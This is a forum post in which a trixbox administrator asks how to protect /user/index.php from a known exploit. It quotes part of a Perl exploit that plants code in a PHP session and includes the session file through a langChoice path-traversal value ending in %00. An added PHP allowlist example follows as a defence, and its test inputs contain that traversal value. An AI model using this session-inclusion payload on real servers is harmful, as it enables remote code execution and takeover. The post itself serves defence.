Hello, I have trixbox installed and recently I found out that there is an exploit with connect-back with which you can get access to the server. The problem is in /user/index.php. I found the exploit and it's made in Perl.

Code:

    usage() unless @ARGV;
    my $url = "http://$ARGV[0]/user/index.php";
    my $ua = LWP::UserAgent->new;
    my $cookie_jar = HTTP::Cookies->new;
    $ua->cookie_jar($cookie_jar);
    menu();

    sub execScript{
        my $scriptCode = shift;
        post($scriptCode);
        my $phpsessionid = extractPHPSID($cookie_jar->as_string);
        post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00");
    }

It's getting access to /tmp. I've tried to chmod 755 /tmp, but then the index doesn't work; it gives an error.

Code:

    <?php
    apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"]))));
    apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"]))));
    ini_set("error_reporting","E_ALL & ~E_NOTICE");
    //session_start();
    require 'includes/smartysetup.php';
    require_once("includes/xajax.inc.php");
    include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version
    $smarty->assign("tbversion",tbversion());
    $smarty->assign("title","trixbox - User Mode");
    ...
    ?>

I've tried to comment out session_start(); it works, but does it give any problems? How do I secure it to keep hackers out?
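
The request in the Perl snippet sends a langChoice value built from ../ sequences with a trailing %00, pointing at a session file under /tmp. The PHP below is an added example, not part of the original post and not trixbox's own code: it validates such a value against an allowlist pattern and confirms the resolved path stays inside the language directory. It assumes the page selects a language file from langChoice; LANG_DIR, DEFAULT_LANG and resolve_language_file() are hypothetical names.

```php
<?php
// Added example, not trixbox code. Assumption: the page selects a language
// file from the POSTed langChoice value; LANG_DIR and the file layout
// (<LANG_DIR>/<code>.php) are hypothetical.
const LANG_DIR = __DIR__ . '/language';
const DEFAULT_LANG = 'english';

function resolve_language_file($choice, string $langDir = LANG_DIR): string
{
    $default = $langDir . '/' . DEFAULT_LANG . '.php';

    // Arrays, null and other non-strings are rejected outright.
    if (!is_string($choice)) {
        return $default;
    }
    // Allowlist by shape: letters, digits, underscore, hyphen only.
    // This rejects "/", "." and the NUL byte (%00) used to cut off a suffix.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $choice)) {
        return $default;
    }
    // Resolve symlinks and confirm the file really sits inside $langDir.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $choice . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $default;
    }
    // The caller includes only this returned path, never the raw input.
    return $path;
}

// Constructed sample inputs, including the shape of the value from the post.
$samples = [
    'english',
    'french',
    "../../../../tmp/sess_abc123\0",
    ['nested'],
];
foreach ($samples as $s) {
    printf("%-40s => %s\n", json_encode($s), resolve_language_file($s));
}
```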